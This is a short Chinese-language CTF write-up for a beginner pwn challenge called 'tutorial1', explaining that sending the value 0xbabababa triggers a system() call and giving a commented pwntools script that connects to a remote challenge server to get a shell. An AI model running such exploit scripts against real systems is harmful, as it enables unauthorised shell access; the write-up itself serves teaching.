[Pwn]tutorial1 xp0int Posted on Oct 28 2018 # tutorial1 <br> pwn送分题,ida打开,发现只需输入`0xbabababa`修改buf的值即可调用system函数获取shell。  <br> 此处照顾没有学过pwn的人,脚本有简单注释 ```python from pwn import * # 导入pwn模块 # p = process('./tutorial1') # 本地运行 p = remote('35.221.144.41',10003) # 远程连接 p.recvuntil(':') # 从进程(本地/远程) # 读取数据直到':'字符串 p.send(p64(0xbabababa)) # 向进程发送0xbabababa # 因为小端原因,需要用p64转换 p.interactive() # 从终端和进程直接交互 ``` 打赏还是打残,这是个问题 赏 Wechat Pay Alipay [Misc]bitcoin_base [Misc]加密了吗
没有帐号? 立即注册